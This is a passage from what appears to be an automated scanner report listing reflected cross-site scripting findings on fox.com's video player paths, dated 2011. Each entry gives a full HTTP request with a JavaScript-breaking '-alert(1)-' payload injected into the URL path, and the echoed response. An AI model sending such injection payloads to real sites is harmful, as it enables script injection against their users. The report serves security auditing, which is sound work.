Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 22213
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:58 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui80c7a"-alert(1)-"06df9c9be7a:fox_playerfoxlayoutplugin"
s_analytics.hier1="fox:shows:_ui80c7a"-alert(1)-"06df9c9be7a:fox_playerfoxlayoutplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui80c7a"-ale
...[SNIP]...

2.181. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4078"-alert(1)-"68c87225648 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playerc4078"-alert(1)-"68c87225648/swf/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 22185
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:03 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playerc4078"-alert(1)-"68c87225648foxlayoutplugin"
s_analytics.hier1="fox:shows:_ui:fox_playerc4078"-alert(1)-"68c87225648foxlayoutplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playerc4078"-ale
...[SNIP]...

2.182. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd4ce"-alert(1)-"5577958729 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swffd4ce"-alert(1)-"5577958729/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.102
Content-Type: text/html; charset=utf-8
Content-Length: 22072
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswffd4ce"-alert(1)-"5577958729"
s_analytics.prop15="sub section:foxlayoutplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analyti
...[SNIP]...

2.183. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce750"-alert(1)-"20611a4ed72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uice750"-alert(1)-"20611a4ed72/fox_player/swf/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.105
Content-Type: text/html; charset=utf-8
Content-Length: 22225
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uice750"-alert(1)-"20611a4ed72:fox_playerfoxomnituremonitor"
s_analytics.hier1="fox:shows:_uice750"-alert(1)-"20611a4ed72:fox_playerfoxomnituremonitor" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uice75
...[SNIP]...

2.184. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7db3"-alert(1)-"c57217a35f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playera7db3"-alert(1)-"c57217a35f4/swf/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.102
Content-Type: text/html; charset=utf-8
Content-Length: 22197
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:53 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playera7db3"-alert(1)-"c57217a35f4foxomnituremonitor"
s_analytics.hier1="fox:shows:_ui:fox_playera7db3"-alert(1)-"c57217a35f4foxomnituremonitor" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playera7db
...[SNIP]...

2.185. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a97a5"-alert(1)-"52e55e816b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swfa97a5"-alert(1)-"52e55e816b9/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.108
Content-Type: text/html; charset=utf-8
Content-Length: 22085
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:58 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfa97a5"-alert(1)-"52e55e816b9"
s_analytics.prop15="sub section:foxomnituremonitor" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_anal
...[SNIP]...

2.186. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5720"-alert(1)-"78047514c7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uif5720"-alert(1)-"78047514c7d/fox_player/swf/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 22185
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:55 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uif5720"-alert(1)-"78047514c7d:fox_playerakamaihd"
s_analytics.hier1="fox:shows:_uif5720"-alert(1)-"78047514c7d:fox_playerakamaihd" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uif5720"-alert(1)-"7804751
...[SNIP]...

2.187. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f81b1"-alert(1)-"99f5496527 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playerf81b1"-alert(1)-"99f5496527/swf/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.120
Content-Type: text/html; charset=utf-8
Content-Length: 22152
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:59 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playerf81b1"-alert(1)-"99f5496527akamaihd"
s_analytics.hier1="fox:shows:_ui:fox_playerf81b1"-alert(1)-"99f5496527akamaihd" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playerf81b1"-alert(1)-"99f54965
...[SNIP]...

2.188. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60700"-alert(1)-"2d10ecc9658 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf60700"-alert(1)-"2d10ecc9658/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.103
Content-Type: text/html; charset=utf-8
Content-Length: 22045
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:04 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf60700"-alert(1)-"2d10ecc9658"
s_analytics.prop15="sub section:akamaihd" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQ
...[SNIP]...

2.189. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6750"-alert(1)-"fe038b27593 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uib6750"-alert(1)-"fe038b27593/fox_player/swf/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.117
Content-Type: text/html; charset=utf-8
Content-Length: 22209
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:48 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uib6750"-alert(1)-"fe038b27593:fox_playerauthentication"
s_analytics.hier1="fox:shows:_uib6750"-alert(1)-"fe038b27593:fox_playerauthentication" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uib6750"-alert
...[SNIP]...

2.190. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a871"-alert(1)-"e5d9947b15d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player9a871"-alert(1)-"e5d9947b15d/swf/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 22181
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:52 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player9a871"-alert(1)-"e5d9947b15dauthentication"
s_analytics.hier1="fox:shows:_ui:fox_player9a871"-alert(1)-"e5d9947b15dauthentication" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player9a871"-alert
...[SNIP]...

2.191. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 175c3"-alert(1)-"c8766271a5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf175c3"-alert(1)-"c8766271a5f/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.107
Content-Type: text/html; charset=utf-8
Content-Length: 22069
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:55 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf175c3"-alert(1)-"c8766271a5f"
s_analytics.prop15="sub section:authentication" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytic
...[SNIP]...

2.192. http://www.fox.com/_ui/fox_player/swf/comScore.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/comScore.swf

Issue detail

